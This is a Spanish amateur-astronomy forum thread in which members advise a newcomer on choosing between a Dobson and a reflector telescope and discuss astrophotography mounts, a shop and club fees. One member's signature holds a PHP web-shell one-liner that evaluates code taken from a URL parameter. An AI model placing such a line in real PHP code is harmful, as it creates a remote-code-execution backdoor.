Presentacion + consejos

Preguntas básicas sobre astronomía
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentacion + consejos

Mensaje por Manuelariza »

Entre el Dobson de Meade de 8" y el reflactor Celestron de 150/750, yo en particular me quedaria con el primero, la calidad en general y la abertura son mejores, pero como te decidas por la astrofotografia con el Dobson es mas conplicado, los dos antes tienes que motorizarlos para poder seguir el objeto que quieres fotografiar, el celestron es facil (te lo venden todo) pero el Dobson creo que no.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Presentacion + consejos

Mensaje por astrolozano »

Un apunte: para fotografía planetaria no te hace falta una montura ecuatorial, puedes hacerlo con la dobson perfectamente. Y una ecuatorial mala no te permitirá hacer un buen seguimiento si quieres fotografías de cielo profundo (tiene que soportar el peso del tubo principal, la cámara, y el tubo guía).

Lo que quiero decir con esto es que con el dobson podrás hacer la misma fotografía que con una ecuatorial mala: sólo podrás hacer planetaria.
Y la calidad y estabilidad de una ecuatorial mala, será MUCHO peor que la del dobson, a pesar de tener un precio superior. Además piensa que para mantener el precio en torno a 300
Ciempozuelos
Mensajes: 15
Registrado: Lun Ago 11, 2008 12:36 pm

Presentacion + consejos

Mensaje por Ciempozuelos »

Aire Libre esta cerrado por vacaciones hasta el 1 de septiembre ((¡¡menudo susto me dieron porque tenia que recoger el pedido justo cuando estaban de vacaciones, pero me lo dieron!!!) Yo hice el pedido por telefono y aunque les hice el pago por transferencia me dijeron que no hacia falta. Tambien lo puedes encargar en la tienda, pero por telefono te ahorras el viaje y solo tienes que ir a buscarlo.

Preguntar por José Ruano, fue quien me atendio a mi y ya os digo que apesar de la confusion me trataron fenomenal.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentacion + consejos

Mensaje por Manuelariza »

Es increible las respuestas que a tenido este tema en tampoco tiempo, da gusto un foro tan animado.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

[quote="MAL1"]Es increible las respuestas que a tenido este tema en tampoco tiempo, da gusto un foro tan animado.[/quote]

Y eso en pleno Agosto :shock: :shock: :shock:
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentacion + consejos

Mensaje por Manuelariza »

:x La crisis que nos deja en casa......
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Presentacion + consejos

Mensaje por astrolozano »

es que hay luna llena 8)
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

[quote="MAL1"]Es increible las respuestas que a tenido este tema en tampoco tiempo, da gusto un foro tan animado.[/quote]

Y que lo digas. Y no veas como os lo agradezco, porque sino hubiera comprado cualquier cosa.
Si esto es asi en agosto como decis, ¡¿como debe ser en mejores epocas?! Asi la verdad es que enganchais a cualquiera, ni que os llevarais un porcentaje de los beneficios jeje.
De todas formas, en los demas foros que he entrado ocurre lo mismo, todo el mundo ayuda a los demas, siempre de buenas maneras, sin salidas de tono... Asi da gusto y dan ganas de ir a todas las salidas.

Por cierto, ¿cuantos socios sois? Ya he leido que la cuota son 10
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Presentacion + consejos

Mensaje por astrolozano »

Son 10
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

Bueno, por ahora se me complican las escapadas nocturnas ya que mi coche se ha escacharrado sin previo aviso. Mañana ira camino del taller. Quizas tenga que posponer tambien la compra del teles, aunque espero que no ;)
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
Responder